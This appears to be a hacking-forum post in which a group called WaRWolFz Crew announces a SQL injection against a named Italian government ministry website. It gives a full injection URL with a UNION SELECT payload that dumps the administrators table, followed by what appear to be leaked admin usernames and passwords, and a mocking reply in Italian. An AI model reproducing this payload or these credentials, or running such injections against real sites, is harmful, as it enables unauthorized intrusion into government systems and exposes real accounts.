SviluppoEconomico.gov.it SQL Injection

[imported_D4nt3]

######################################################################################
# Author/s: Dante90, WaRWolFz Crew                                                   #
# Target: http://www.sviluppoeconomico.gov.it/                                       #
# Web: www.warwolfz.org                                                              #
# Vulnerability: SQL Injection                                                       #
######################################################################################

http://www.sviluppoeconomico.gov.it/organigramma/dossier.php?id_dossier=117&sezione=organigramma&tema_dir=tema2&gruppo=-1 UNION SELECT CONCAT_WS(CHAR(32,58,32),i_id,t_user,t_password) FROM amministratori--

2 : 1 : 75Redazione09 : fgjwmsn45!_-gj23/ : : : : : 0 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 0 : 1
65 : 1 : 75majorbit09 : gKrst__lm!f/sd : : : : : 0 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1 : 1


Dante90

Ho censurato parte dell'SQL Dante

 

[fojeaf]

XD .gov.it <= il dominio già è una garanzia di sicurezza